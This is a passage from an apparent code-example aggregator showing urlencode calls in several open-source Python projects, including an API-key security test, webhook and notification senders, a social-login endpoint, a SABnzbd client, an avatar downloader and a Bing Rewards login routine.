        # * Frustrated, he tries again with the right API key.
        response = urlopen(base_json_url, urlencode({'api_key': api_key}))

        # * He gets the data he expected.
        json_data = json.load(response)
        self.assertEquals(json_data['1']['1'], 5)

        # * He changes the API key in the JSON API dialog.
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        old_api_url = self.selenium.get_value('css=#id_security_form_json_api_url')
        self.selenium.type('id=id_security_form_json_api_key', 'some_new_api_ke')
        self.selenium.focus('id=id_security_form_json_api_key')

        # He sees that the api url is updated with every keystroke
        self.human_key_press(key_codes.END) # Move IE insert point to the end
        self.human_key_press(key_codes.LETTER_Y)

        self.assertEquals(
            self.selenium.get_value('css=#id_security_form_json_api_url'),
            old_api_url.replace(api_key, 'some_new_api_key')
        )
        self.selenium.click('id=id_security_form_ok_button')
        self.wait_for_element_visibility('id=id_security_form', False)

        # * He tries again, using the old key
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': api_key}))
        # * He gets a 403
        self.assertEquals(mngr.exception.code, 403)

        # * He tries using the right key.
        response = urlopen(base_json_url, urlencode({'api_key': 'some_new_api_key'}))

        # * It works.
        json_data = json.load(response)
        self.assertEquals(json_data['1']['1'], 5)

        # * He refreshes the sheet page
        self.refresh_sheet_page()

        # * and notes that his setting has been remembered by the server
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.assertEquals(self.selenium.get_value('id=id_security_form_json_enabled_checkbox'), 'on')

        # * He makes the sheet private again.
        self.selenium.click('id=id_security_button')
        self.wait_for_element_visibility('id=id_security_form', True)
        self.wait_for_element_visibility('id=id_security_form_save_error', False)
        self.selenium.click('id=id_security_form_json_enabled_checkbox')
        self.selenium.click('id=id_security_form_ok_button')
        self.wait_for_element_visibility('id=id_security_form', False)

        # * He tries with the key that worked last time.
        with self.assertRaises(HTTPError) as mngr:
            urlopen(base_json_url, urlencode({'api_key': 'some_new_api_key'}))
        # * He gets a 403
        self.assertEquals(mngr.exception.code, 403)

Example 24

Project: rapidpro
Source File: models.py
View license
    @classmethod
    def trigger_flow_event(cls, webhook_url, flow, run, node_uuid, contact, event, action='POST', resthook=None):
        org = flow.org
        api_user = get_api_user()
        json_time = datetime_to_str(timezone.now())

        # get the results for this contact
        results = flow.get_results(contact)
        values = []

        if results and results[0]:
            values = results[0]['values']
            for value in values:
                value['time'] = datetime_to_str(value['time'])
                value['value'] = unicode(value['value'])

        # if the action is on the first node
        # we might not have an sms (or channel) yet
        channel = None
        text = None
        contact_urn = contact.get_urn()

        if event:
            text = event.text
            channel = event.channel
            contact_urn = event.contact_urn

        if channel:
            channel_id = channel.pk
        else:
            channel_id = -1

        steps = []
        for step in run.steps.prefetch_related('messages', 'broadcasts').order_by('arrived_on'):
            steps.append(dict(type=step.step_type,
                              node=step.step_uuid,
                              arrived_on=datetime_to_str(step.arrived_on),
                              left_on=datetime_to_str(step.left_on),
                              text=step.get_text(),
                              value=step.rule_value))

        data = dict(channel=channel_id,
                    relayer=channel_id,
                    flow=flow.id,
                    flow_name=flow.name,
                    flow_base_language=flow.base_language,
                    run=run.id,
                    text=text,
                    step=unicode(node_uuid),
                    phone=contact.get_urn_display(org=org, scheme=TEL_SCHEME, formatted=False),
                    contact=contact.uuid,
                    urn=unicode(contact_urn),
                    values=json.dumps(values),
                    steps=json.dumps(steps),
                    time=json_time)

        if not action:
            action = 'POST'

        webhook_event = WebHookEvent.objects.create(org=org,
                                                    event=FLOW,
                                                    channel=channel,
                                                    data=json.dumps(data),
                                                    try_count=1,
                                                    action=action,
                                                    resthook=resthook,
                                                    created_by=api_user,
                                                    modified_by=api_user)

        status_code = -1
        message = "None"
        body = None

        # webhook events fire immediately since we need the results back
        try:
            # only send webhooks when we are configured to, otherwise fail
            if not settings.SEND_WEBHOOKS:
                raise Exception("!! Skipping WebHook send, SEND_WEBHOOKS set to False")

            # no url, bail!
            if not webhook_url:
                raise Exception("No webhook_url specified, skipping send")

            # some hosts deny generic user agents, use Temba as our user agent
            if action == 'GET':
                response = requests.get(webhook_url, headers=TEMBA_HEADERS, timeout=10)
            else:
                response = requests.post(webhook_url, data=data, headers=TEMBA_HEADERS, timeout=10)

            response_text = response.text
            body = response.text
            status_code = response.status_code

            if response.status_code == 200 or response.status_code == 201:
                try:
                    response_json = json.loads(response_text)

                    # only update if we got a valid JSON dictionary or list
                    if not isinstance(response_json, dict) and not isinstance(response_json, list):
                        raise ValueError("Response must be a JSON dictionary or list, ignoring response.")

                    run.update_fields(response_json)
                    message = "Webhook called successfully."
                except ValueError as e:
                    message = "Response must be a JSON dictionary, ignoring response."

                webhook_event.status = COMPLETE
            else:
                webhook_event.status = FAILED
                message = "Got non 200 response (%d) from webhook." % response.status_code
                raise Exception("Got non 200 response (%d) from webhook." % response.status_code)

        except Exception as e:
            import traceback
            traceback.print_exc()

            webhook_event.status = FAILED
            message = "Error calling webhook: %s" % unicode(e)

        finally:
            webhook_event.save()

            # make sure our message isn't too long
            if message:
                message = message[:255]

            result = WebHookResult.objects.create(event=webhook_event,
                                                  url=webhook_url,
                                                  status_code=status_code,
                                                  body=body,
                                                  message=message,
                                                  data=urlencode(data, doseq=True),
                                                  created_by=api_user,
                                                  modified_by=api_user)

            # if this is a test contact, add an entry to our action log
            if run.contact.is_test:
                from temba.flows.models import ActionLog
                log_txt = "Triggered <a href='%s' target='_log'>webhook event</a> - %d" % (reverse('api.log_read', args=[webhook_event.pk]), status_code)
                ActionLog.create(run, log_txt, safe=True)

        return result

Example 25

Project: Authtopus
Source File: api.py
View license
    @SocialLoginMessage.method( request_fields=( 'access_token', 'provider',
                                                 'password',
                                                 'register_new_user',
                                                 'authtopus_access_token', ),
                                path='social_login',
                                http_method='POST',
                                name='social_login' )
    def SocialLogin( self, slm ):
        if slm.provider is None or slm.access_token is None:
            raise BadRequestException( 'No provider or access token given' )
        # Fetch the user info
        social_id = None
        url = PROVIDER_URLS.get( slm.provider.lower( ) )
        if url is None:
            raise BadRequestException( 'Unknown provider' )
        url = url.format( urlencode( { 'access_token': slm.access_token } ) )
        try:
            result = urlfetch.fetch( url )
        except urlfetch.Error:
            raise InternalServerErrorException(
                'Failed to login with {p}. Please try again later.'.format(
                    p=provider )
            )
        if result.status_code == 200:
            body = json.loads( result.content )
            social_id = body.get( 'id' )
            # Determine if email provided, if any, is verified
            if slm.provider.lower( ) == 'facebook':
                # Can assume Facebook emails are verified:
                # http://stackoverflow.com/questions/14280535
                # /is-it-possible-to-check-if-an-email-is-confirmed-on-facebook
                verified = True
            elif slm.provider.lower( ) == 'google':
                verified = body.get( 'verified_email' )
            else:
                logging.error( 'Unexpected provider: ' + slm.provider )
                raise BadRequestException( 'Unknown provider' )
            # Grab the social email and create a username based on the email
            # with most non-alphanumeric characters removed
            social_email = body.get( 'email' )
            username = None
            if social_email:
                username = social_email.split( '@' )[ 0 ]
                username = re.sub( '[^a-zA-Z0-9_-]+', '', username )
                if len( username ) > 17:
                    username = username[ :17 ]
            if not username:
                username = 'dummy'
            if not verified:
                # Don't actually use the social email if it is not verified
                social_email = None

        if social_id:
            # Need to fetch the user id associated with this social id
            # + email, or create a new user if one does not yet exist

            # Check if a user with this social id already exists
            auth_id = '{0}:{1}'.format( slm.provider.lower( ), social_id )
            slm.user = User.get_by_auth_id( auth_id )
            if slm.user is None:
                # Social id not in use. Try getting user by verified email
                # to see if we can add social login with an existing user
                if social_email is not None:
                    slm.user = User.get_by_email_verified( social_email )
                if slm.user is None:
                    # Email not in use either
                    if not slm.register_new_user:
                        msg = 'Failed to find registered user'
                        if social_email is not None:
                            msg += ' with verified email [' + social_email + ']'
                        msg += '. Have you registered yet?'
                        raise BadRequestException( msg )
                    elif( config.USE_ACCESS_TOKENS
                          and not User.validate_access_token(
                              slm.authtopus_access_token ) ):
                        raise BadRequestException( 'Invalid access token' )

                    # Create a new user.

                    # Try creating a new user by varying the username
                    for num in range( 1000 ):
                        suffix = ''
                        if num > 0:
                            suffix = str( num )
                        this_username = username + suffix
                        unique_properties = [ 'username' ]
                        if social_email is not None:
                            unique_properties.append( 'email_verified' )
                            
                        ok, info = User.create_user(
                            auth_id,
                            unique_properties=unique_properties,
                            email_verified=social_email,
                            email_pending=social_email,
                            username=this_username,
                            is_mod=False )
                        if ok:
                            slm.user = info
                            if config.USE_ACCESS_TOKENS:
                                User.delete_access_token(
                                    slm.authtopus_access_token )
                            custom.user_created( slm.user )
                            break
                        elif( 'email' in info
                              and social_email is not None ):
                            # Looks like the social email is in use after all.
                            # This could happen, for instance, if a user tried
                            # to double register at the same time.
                            raise ConflictException(
                                'Email [' + social_email + '] for this account'
                                + ' is already in use. '
                                + 'Did you accidentally try to login twice, '
                                + 'or have you not verified your email address'
                                + ' yet?')
                    else:
                        # Failed to create an account after 1000 tries
                        raise ConflictException(
                            'Encountered conflict when creating new account.' )
                else:
                    # Email is in use, but social_id is not.
                    # If the User has a password, we require it before
                    # adding the social auth id to the User
                    if slm.user.has_password:
                        if not slm.password:
                            # Need a password, but none provided
                            slm.password_required = True
                            return slm
                        if not slm.user.check_password( slm.password ):
                            # Need a password, but provided password invalid
                            raise UnauthorizedException(
                                'Invalid credentials' )

                    # Now add the social auth id
                    ok, info = slm.user.add_auth_id( auth_id )
                    if ok:
                        slm.user = info
                    else:
                        raise ConflictException(
                            'Encountered conflict when adding auth id to '
                            + 'existing account, conflicting properties: '
                            + str( info ) )

            if( social_email
                and slm.user.email_pending_lower == social_email.lower( )
                and slm.user.email_verified_lower != social_email.lower( ) ):
                # Email is now verified by social login
                slm.user = self.validate_email_internal( slm.user )
                
            # Create auth token
            slm.user_id_auth_token = self.create_user_id_auth_token(
                slm.user.get_id( ) )
            if slm.user_id_auth_token is None:
                raise ConflictException(
                    'Encountered conflict when creating auth token' )
        else:
            raise BadRequestException(
                'Access token did not provide valid id' )

        return slm

Example 26

Project: entropy
Source File: client.py
View license
    def _generic_post_handler(self, function_name, params, file_params,
        timeout):
        """
        Given a function name and the request data (dict format), do the actual
        HTTP request and return the response object to caller.
        WARNING: params and file_params dict keys must be ASCII string only.

        @param function_name: name of the function that called this method
        @type function_name: string
        @param params: POST parameters
        @type params: dict
        @param file_params: mapping composed by file names as key and tuple
            composed by (file_name, file object) as values
        @type file_params: dict
        @param timeout: socket timeout
        @type timeout: float
        @return: tuple composed by the server response string or None
            (in case of empty response) and the HTTPResponse object (useful
                for checking response status)
        @rtype: tuple
        """
        if timeout is None:
            timeout = self._default_timeout_secs
        multipart_boundary = "---entropy.services,boundary---"
        request_path = self._request_path.rstrip("/") + "/" + function_name
        const_debug_write(__name__,
            "WebService _generic_post_handler, calling: %s at %s -- %s,"
            " tx_callback: %s, timeout: %s" % (self._request_host, request_path,
                params, self._transfer_callback, timeout,))
        connection = None
        try:
            if self._request_protocol == "http":
                connection = httplib.HTTPConnection(self._request_host,
                    timeout = timeout)
            elif self._request_protocol == "https":
                ssl_context = None
                if hasattr(ssl, 'create_default_context'):
                    ssl_context = ssl.create_default_context(
                        purpose = ssl.Purpose.CLIENT_AUTH)
                connection = httplib.HTTPSConnection(
                    self._request_host, timeout = timeout, context = ssl_context)
            else:
                raise WebService.RequestError("invalid request protocol",
                    method = function_name)

            headers = {
                "Accept": "text/plain",
                "User-Agent": self._generate_user_agent(function_name),
            }

            if file_params is None:
                file_params = {}
            # autodetect file parameters in params
            for k in list(params.keys()):
                if isinstance(params[k], (tuple, list)) \
                    and (len(params[k]) == 2):
                    f_name, f_obj = params[k]
                    if isinstance(f_obj, file):
                        file_params[k] = params[k]
                        del params[k]
                elif const_isunicode(params[k]):
                    # convert to raw string
                    params[k] = const_convert_to_rawstring(params[k],
                        from_enctype = "utf-8")
                elif not const_isstring(params[k]):
                    # invalid ?
                    if params[k] is None:
                        # will be converted to ""
                        continue
                    int_types = const_get_int()
                    supported_types = (float, list, tuple) + int_types
                    if not isinstance(params[k], supported_types):
                        raise WebService.UnsupportedParameters(
                            "%s is unsupported type %s" % (k, type(params[k])))
                    list_types = (list, tuple)
                    if isinstance(params[k], list_types):
                        # not supporting nested lists
                        non_str = [x for x in params[k] if not \
                            const_isstring(x)]
                        if non_str:
                            raise WebService.UnsupportedParameters(
                                "%s is unsupported type %s" % (k,
                                    type(params[k])))

            body = None
            if not file_params:
                headers["Content-Type"] = "application/x-www-form-urlencoded"
                encoded_params = urllib_parse.urlencode(params)
                data_size = len(encoded_params)
                if self._transfer_callback is not None:
                    self._transfer_callback(0, data_size, False)

                if data_size < 65536:
                    try:
                        connection.request("POST", request_path, encoded_params,
                            headers)
                    except socket.error as err:
                        raise WebService.RequestError(err,
                            method = function_name)
                else:
                    try:
                        connection.request("POST", request_path, None, headers)
                    except socket.error as err:
                        raise WebService.RequestError(err,
                            method = function_name)
                    sio = StringIO(encoded_params)
                    data_size = len(encoded_params)
                    while True:
                        chunk = sio.read(65535)
                        if not chunk:
                            break
                        try:
                            connection.send(chunk)
                        except socket.error as err:
                            raise WebService.RequestError(err,
                                method = function_name)
                        if self._transfer_callback is not None:
                            self._transfer_callback(sio.tell(),
                                data_size, False)
                # for both ways, send a signal through the callback
                if self._transfer_callback is not None:
                    self._transfer_callback(data_size, data_size, False)

            else:
                headers["Content-Type"] = "multipart/form-data; boundary=" + \
                    multipart_boundary
                body_file, body_fpath = self._encode_multipart_form(params,
                    file_params, multipart_boundary)
                try:
                    data_size = body_file.tell()
                    headers["Content-Length"] = str(data_size)
                    body_file.seek(0)
                    if self._transfer_callback is not None:
                        self._transfer_callback(0, data_size, False)

                    try:
                        connection.request("POST", request_path, None, headers)
                    except socket.error as err:
                        raise WebService.RequestError(err,
                            method = function_name)
                    while True:
                        chunk = body_file.read(65535)
                        if not chunk:
                            break
                        try:
                            connection.send(chunk)
                        except socket.error as err:
                            raise WebService.RequestError(err,
                                method = function_name)
                        if self._transfer_callback is not None:
                            self._transfer_callback(body_file.tell(),
                                data_size, False)
                    if self._transfer_callback is not None:
                        self._transfer_callback(data_size, data_size, False)
                finally:
                    body_file.close()
                    os.remove(body_fpath)

            try:
                response = connection.getresponse()
            except socket.error as err:
                raise WebService.RequestError(err,
                    method = function_name)
            const_debug_write(__name__, "WebService.%s(%s), "
                "response header: %s" % (
                    function_name, params, response.getheaders(),))
            total_length = response.getheader("Content-Length", "-1")
            try:
                total_length = int(total_length)
            except ValueError:
                total_length = -1
            outcome = const_convert_to_rawstring("")
            current_len = 0
            if self._transfer_callback is not None:
                self._transfer_callback(current_len, total_length, True)
            while True:
                try:
                    chunk = response.read(65536)
                except socket.error as err:
                    raise WebService.RequestError(err,
                        method = function_name)
                if not chunk:
                    break
                outcome += chunk
                current_len += len(chunk)
                if self._transfer_callback is not None:
                    self._transfer_callback(current_len, total_length, True)

            if self._transfer_callback is not None:
                self._transfer_callback(total_length, total_length, True)

            if const_is_python3():
                outcome = const_convert_to_unicode(outcome)
            if not outcome:
                return None, response
            return outcome, response

        except httplib.HTTPException as err:
            raise WebService.RequestError(err,
                method = function_name)
        finally:
            if connection is not None:
                connection.close()

Example 27

Project: eden
Source File: s3notify.py
View license
    @classmethod
    def notify(cls, resource_id):
        """
            Asynchronous task to notify a subscriber about updates,
            runs a POST?format=msg request against the subscribed
            controller which extracts the data and renders and sends
            the notification message (see send()).

            @param resource_id: the pr_subscription_resource record ID
        """

        _debug("S3Notifications.notify(resource_id=%s)", resource_id)

        db = current.db
        s3db = current.s3db

        stable = s3db.pr_subscription
        rtable = db.pr_subscription_resource
        ftable = s3db.pr_filter

        # Extract the subscription data
        join = stable.on(rtable.subscription_id == stable.id)
        left = ftable.on(ftable.id == stable.filter_id)

        # @todo: should not need rtable.resource here
        row = db(rtable.id == resource_id).select(stable.id,
                                                  stable.pe_id,
                                                  stable.frequency,
                                                  stable.notify_on,
                                                  stable.method,
                                                  stable.email_format,
                                                  rtable.id,
                                                  rtable.resource,
                                                  rtable.url,
                                                  rtable.last_check_time,
                                                  ftable.query,
                                                  join=join,
                                                  left=left).first()
        if not row:
            return True

        s = getattr(row, "pr_subscription")
        r = getattr(row, "pr_subscription_resource")
        f = getattr(row, "pr_filter")

        # Create a temporary token to authorize the lookup request
        auth_token = str(uuid4())

        # Store the auth_token in the subscription record
        r.update_record(auth_token=auth_token)
        db.commit()

        # Construct the send-URL
        settings = current.deployment_settings
        public_url = settings.get_base_public_url()
        lookup_url = "%s/%s/%s" % (public_url,
                                   current.request.application,
                                   r.url.lstrip("/"))

        # Break up the URL into its components
        purl = list(urlparse.urlparse(lookup_url))

        # Subscription parameters
        last_check_time = s3_encode_iso_datetime(r.last_check_time)
        query = {"subscription": auth_token, "format": "msg"}
        if "upd" in s.notify_on:
            query["~.modified_on__ge"] = last_check_time
        else:
            query["~.created_on__ge"] = last_check_time

        # Filters
        if f.query:
            from s3filter import S3FilterString
            resource = s3db.resource(r.resource)
            fstring = S3FilterString(resource, f.query)
            for k, v in fstring.get_vars.iteritems():
                if v is not None:
                    if k in query:
                        value = query[k]
                        if type(value) is list:
                            value.append(v)
                        else:
                            query[k] = [value, v]
                    else:
                        query[k] = v
            query_nice = s3_unicode(fstring.represent())
        else:
            query_nice = None

        # Add subscription parameters and filters to the URL query, and
        # put the URL back together
        query = urlencode(query)
        if purl[4]:
            query = "&".join((purl[4], query))
        page_url = urlparse.urlunparse([purl[0], # scheme
                                        purl[1], # netloc
                                        purl[2], # path
                                        purl[3], # params
                                        query,   # query
                                        purl[5], # fragment
                                        ])

        # Serialize data for send (avoid second lookup in send)
        data = json.dumps({"pe_id": s.pe_id,
                           "notify_on": s.notify_on,
                           "method": s.method,
                           "email_format": s.email_format,
                           "resource": r.resource,
                           "last_check_time": last_check_time,
                           "filter_query": query_nice,
                           "page_url": lookup_url,
                           "item_url": None,
                           })

        # Send the request
        _debug("Requesting %s", page_url)
        req = urllib2.Request(page_url, data=data)
        req.add_header("Content-Type", "application/json")
        success = False
        try:
            response = json.loads(urllib2.urlopen(req).read())
            message = response["message"]
            if response["status"] == "success":
                success = True
        except urllib2.HTTPError, e:
            message = ("HTTP %s: %s" % (e.code, e.read()))
        except:
            exc_info = sys.exc_info()[:2]
            message = ("%s: %s" % (exc_info[0].__name__, exc_info[1]))
        _debug(message)

        # Update time stamps and unlock, invalidate auth token
        intervals = s3db.pr_subscription_check_intervals
        interval = datetime.timedelta(minutes=intervals.get(s.frequency, 0))
        if success:
            last_check_time = datetime.datetime.utcnow()
            next_check_time = last_check_time + interval
            r.update_record(auth_token=None,
                            locked=False,
                            last_check_time=last_check_time,
                            next_check_time=next_check_time)
        else:
            r.update_record(auth_token=None,
                            locked=False)
        db.commit()

        # Done
        return message

Example 28

Project: NOT_UPDATED_Sick-Beard-Dutch
Source File: sab.py
View license
def sendNZB(nzb):
    """
    Sends an NZB to SABnzbd via the API.
    
    nzb: The NZBSearchResult object to send to SAB
    """

    # set up a dict with the URL params in it
    params = {}
    if sickbeard.SAB_USERNAME != None:
        params['ma_username'] = sickbeard.SAB_USERNAME
    if sickbeard.SAB_PASSWORD != None:
        params['ma_password'] = sickbeard.SAB_PASSWORD
    if sickbeard.SAB_APIKEY != None:
        params['apikey'] = sickbeard.SAB_APIKEY
    if sickbeard.SAB_CATEGORY != None:
        params['cat'] = sickbeard.SAB_CATEGORY

    # use high priority if specified (recently aired episode)
    if nzb.priority == 1:
        params['priority'] = 1

    # if it's a normal result we just pass SAB the URL
    if nzb.resultType == "nzb":
        # for newzbin results send the ID to sab specifically
        if nzb.provider.getID() == 'newzbin':
            id = nzb.provider.getIDFromURL(nzb.url)
            if not id:
                logger.log("Unable to send NZB to sab, can't find ID in URL " + str(nzb.url), logger.ERROR)
                return False
            params['mode'] = 'addid'
            params['name'] = id
        else:
            params['mode'] = 'addurl'
            params['name'] = nzb.url

    # if we get a raw data result we want to upload it to SAB
    elif nzb.resultType == "nzbdata":
        params['mode'] = 'addfile'
        multiPartParams = {"nzbfile": (nzb.name + ".nzb", nzb.extraInfo[0])}

    url = sickbeard.SAB_HOST + "api?" + urllib.urlencode(params)

    logger.log(u"Sending NZB to SABnzbd")
    logger.log(u"URL: " + url, logger.DEBUG)

    try:
        # if we have the URL to an NZB then we've built up the SAB API URL already so just call it 
        if nzb.resultType == "nzb":
            f = urllib.urlopen(url)
        
        # if we are uploading the NZB data to SAB then we need to build a little POST form and send it
        elif nzb.resultType == "nzbdata":
            cookies = cookielib.CookieJar()
            opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookies),
                                          MultipartPostHandler.MultipartPostHandler)
            req = urllib2.Request(url,
                                  multiPartParams,
                                  headers={'User-Agent': USER_AGENT})

            f = opener.open(req)

    except (EOFError, IOError), e:
        logger.log(u"Unable to connect to SAB: " + ex(e), logger.ERROR)
        return False

    except httplib.InvalidURL, e:
        logger.log(u"Invalid SAB host, check your config: " + ex(e), logger.ERROR)
        return False

    # this means we couldn't open the connection or something just as bad
    if f == None:
        logger.log(u"No data returned from SABnzbd, NZB not sent", logger.ERROR)
        return False

    # if we opened the URL connection then read the result from SAB
    try:
        result = f.readlines()
    except Exception, e:
        logger.log(u"Error trying to get result from SAB, NZB not sent: " + ex(e), logger.ERROR)
        return False

    # SAB shouldn't return a blank result, this most likely (but not always) means that it timed out and didn't recieve the NZB
    if len(result) == 0:
        logger.log(u"No data returned from SABnzbd, NZB not sent", logger.ERROR)
        return False

    # massage the result a little bit
    sabText = result[0].strip()

    logger.log(u"Result text from SAB: " + sabText, logger.DEBUG)

    # do some crude parsing of the result text to determine what SAB said
    if sabText == "ok":
        logger.log(u"NZB sent to SAB successfully", logger.DEBUG)
        return True
    elif sabText == "Missing authentication":
        logger.log(u"Incorrect username/password sent to SAB, NZB not sent", logger.ERROR)
        return False
    else:
        logger.log(u"Unknown failure sending NZB to sab. Return text is: " + sabText, logger.ERROR)
        return False

Example 29

Project: pybossa
Source File: cli.py
View license
def bootstrap_avatars():
    """Download current links from user avatar and projects to real images hosted in the
    PyBossa server."""
    import requests
    import os
    import time
    from urlparse import urlparse
    from PIL import Image

    def get_gravatar_url(email, size):
        # import code for encoding urls and generating md5 hashes
        import urllib, hashlib

        # construct the url
        gravatar_url = "http://www.gravatar.com/avatar/" + hashlib.md5(email.lower()).hexdigest() + "?"
        gravatar_url += urllib.urlencode({'d':404, 's':str(size)})
        return gravatar_url

    with app.app_context():
        if app.config['UPLOAD_METHOD'] == 'local':
            users = User.query.order_by('id').all()
            print "Downloading avatars for %s users" % len(users)
            for u in users:
                print "Downloading avatar for %s ..." % u.name
                container = "user_%s" % u.id
                path = os.path.join(app.config.get('UPLOAD_FOLDER'), container)
                try:
                    print get_gravatar_url(u.email_addr, 100)
                    r = requests.get(get_gravatar_url(u.email_addr, 100), stream=True)
                    if r.status_code == 200:
                        if not os.path.isdir(path):
                            os.makedirs(path)
                        prefix = time.time()
                        filename = "%s_avatar.png" % prefix
                        with open(os.path.join(path, filename), 'wb') as f:
                            for chunk in r.iter_content(1024):
                                f.write(chunk)
                        u.info['avatar'] = filename
                        u.info['container'] = container
                        db.session.commit()
                        print "Done!"
                    else:
                        print "No Gravatar, this user will use the placeholder."
                except:
                    raise
                    print "No gravatar, this user will use the placehoder."


            apps = Project.query.all()
            print "Downloading avatars for %s projects" % len(apps)
            for a in apps:
                if a.info.get('thumbnail') and not a.info.get('container'):
                    print "Working on project: %s ..." % a.short_name
                    print "Saving avatar: %s ..." % a.info.get('thumbnail')
                    url = urlparse(a.info.get('thumbnail'))
                    if url.scheme and url.netloc:
                        container = "user_%s" % a.owner_id
                        path = os.path.join(app.config.get('UPLOAD_FOLDER'), container)
                        try:
                            r = requests.get(a.info.get('thumbnail'), stream=True)
                            if r.status_code == 200:
                                prefix = time.time()
                                filename = "app_%s_thumbnail_%i.png" % (a.id, prefix)
                                if not os.path.isdir(path):
                                    os.makedirs(path)
                                with open(os.path.join(path, filename), 'wb') as f:
                                    for chunk in r.iter_content(1024):
                                        f.write(chunk)
                                a.info['thumbnail'] = filename
                                a.info['container'] = container
                                db.session.commit()
                                print "Done!"
                        except:
                            print "Something failed, this project will use the placehoder."
        if app.config['UPLOAD_METHOD'] == 'rackspace':
            import pyrax
            import tempfile
            pyrax.set_setting("identity_type", "rackspace")
            pyrax.set_credentials(username=app.config['RACKSPACE_USERNAME'],
                                  api_key=app.config['RACKSPACE_API_KEY'],
                                  region=app.config['RACKSPACE_REGION'])

            cf = pyrax.cloudfiles
            users = User.query.all()
            print "Downloading avatars for %s users" % len(users)
            dirpath = tempfile.mkdtemp()
            for u in users:
                try:
                    r = requests.get(get_gravatar_url(u.email_addr, 100), stream=True)
                    if r.status_code == 200:
                        print "Downloading avatar for %s ..." % u.name
                        container = "user_%s" % u.id
                        try:
                            cf.get_container(container)
                        except pyrax.exceptions.NoSuchContainer:
                            cf.create_container(container)
                            cf.make_container_public(container)
                        prefix = time.time()
                        filename = "%s_avatar.png" % prefix
                        with open(os.path.join(dirpath, filename), 'wb') as f:
                            for chunk in r.iter_content(1024):
                                f.write(chunk)
                        chksum = pyrax.utils.get_checksum(os.path.join(dirpath,
                                                                       filename))
                        cf.upload_file(container,
                                       os.path.join(dirpath, filename),
                                       obj_name=filename,
                                       etag=chksum)
                        u.info['avatar'] = filename
                        u.info['container'] = container
                        db.session.commit()
                        print "Done!"
                    else:
                        print "No Gravatar, this user will use the placeholder."
                except:
                    print "No gravatar, this user will use the placehoder."


            apps = Project.query.all()
            print "Downloading avatars for %s projects" % len(apps)
            for a in apps:
                if a.info.get('thumbnail') and not a.info.get('container'):
                    print "Working on project: %s ..." % a.short_name
                    print "Saving avatar: %s ..." % a.info.get('thumbnail')
                    url = urlparse(a.info.get('thumbnail'))
                    if url.scheme and url.netloc:
                        container = "user_%s" % a.owner_id
                        try:
                            cf.get_container(container)
                        except pyrax.exceptions.NoSuchContainer:
                            cf.create_container(container)
                            cf.make_container_public(container)

                        try:
                            r = requests.get(a.info.get('thumbnail'), stream=True)
                            if r.status_code == 200:
                                prefix = time.time()
                                filename = "app_%s_thumbnail_%i.png" % (a.id, prefix)
                                with open(os.path.join(dirpath, filename), 'wb') as f:
                                    for chunk in r.iter_content(1024):
                                        f.write(chunk)
                                chksum = pyrax.utils.get_checksum(os.path.join(dirpath,
                                                                               filename))
                                cf.upload_file(container,
                                               os.path.join(dirpath, filename),
                                               obj_name=filename,
                                               etag=chksum)
                                a.info['thumbnail'] = filename
                                a.info['container'] = container
                                db.session.commit()
                                print "Done!"
                        except:
                            print "Something failed, this project will use the placehoder."

Example 30

Project: BingRewards
Source File: bingAuth.py
View license
    def __authenticateLive(self, login, password):
        """
        Authenticates a user on bing.com with his/her Live account.

        throws AuthenticationError if authentication can not be passed
        throws urllib2.HTTPError if the server couldn't fulfill the request
        throws urllib2.URLError if failed to reach the server
        """
#        print "Requesting bing.com"

# request http://www.bing.com
        request = urllib2.Request(url = bingCommon.BING_URL, headers = self.httpHeaders)
        with self.opener.open(request) as response:
            page = helpers.getResponseBody(response)

# get connection URL for provider Live
        s = page.index('"WindowsLiveId":"')
        s += len('"WindowsLiveId":"')
        e = page.index('"', s)

        url = BingAuth._escapeString(page[s:e])

        request = urllib2.Request(url = url, headers = self.httpHeaders)
        request.add_header("Referer", bingCommon.BING_URL)
        with self.opener.open(request) as response:
            referer = response.geturl()
# get Facebook authenctication form action url
            page = helpers.getResponseBody(response)

# get PPFT parameter
        s = page.index("sFTTag")
        s = page.index('value="', s)
        s += len('value="')
        e = page.index('"', s)
        PPFT = page[s:e]

# get PPSX parameter
        ppsxSearch = self.ppsxValue.search(page)
        if ppsxSearch == None:
            raise AuthenticationError("Could not find variable 't' on Live login page")
        PPSX = ppsxSearch.group(1)

# generate ClientLoginTime
        clt = 20000 + int(random.uniform(0, 1000))

# get url to post data to
        s = page.index(",urlPost:'")
        s += len(",urlPost:'")
        e = page.index("'", s)
        url = page[s:e]

        timestamp = int(round(time.time() * 1000))
        # TODO: randomize times a bit?
        i16 = json.dumps({
            "navigationStart": timestamp,
            "unloadEventStart": timestamp + 209,
            "unloadEventEnd": timestamp + 210,
            "redirectStart": 0,
            "redirectEnd": 0,
            "fetchStart": timestamp + 73,
            "domainLookupStart": timestamp + 73,
            "domainLookupEnd": timestamp + 130,
            "connectStart": timestamp + 130,
            "connectEnd": timestamp + 130,
            "secureConnectionStart": timestamp + 210,
            "requestStart": timestamp + 183,
            "responseStart": timestamp + 205,
            "responseEnd": timestamp + 205,
            "domLoading": timestamp + 208,
            "domInteractive": timestamp + 406,
            "domContentLoadedEventStart": timestamp + 420,
            "domContentLoadedEventEnd": timestamp + 420,
            "domComplete": timestamp + 422,
            "loadEventStart": timestamp + 422,
            "loadEventEnd": 0
        })

        postFields = urllib.urlencode({
            "loginfmt"      : login,
            "login"         : login,
            "passwd"        : password,
            "type"          : "11",
            "PPFT"          : PPFT,
            "PPSX"          : str(PPSX),
            "LoginOptions"  : "3",
            "FoundMSAs"     : "",
            "fspost"        : "0",
            "NewUser"       : "1",
            "i2"            : "1",                  # ClientMode
            "i13"           : "0",                  # ClientUsedKMSI
            "i16"           : i16,
            "i19"           : str(clt),             # ClientLoginTime
            "i21"           : "0",
            "i22"           : "0",
            "i17"           : "0",                  # SRSFailed
            "i18"           : "__DefaultLogin_Strings|1,__DefaultLogin_Core|1," # SRSSuccess
        })

        # get Passport page

        request = urllib2.Request(url, postFields, self.httpHeaders)
        request.add_header("Referer", referer)
        with self.opener.open(request) as response:
            referer = response.geturl()
            page = helpers.getResponseBody(response)

        # Checking for bad usernames and password
        helpers.errorOnText(page, 'That password is incorrect.', 'Authentication has not been passed: Invalid password')
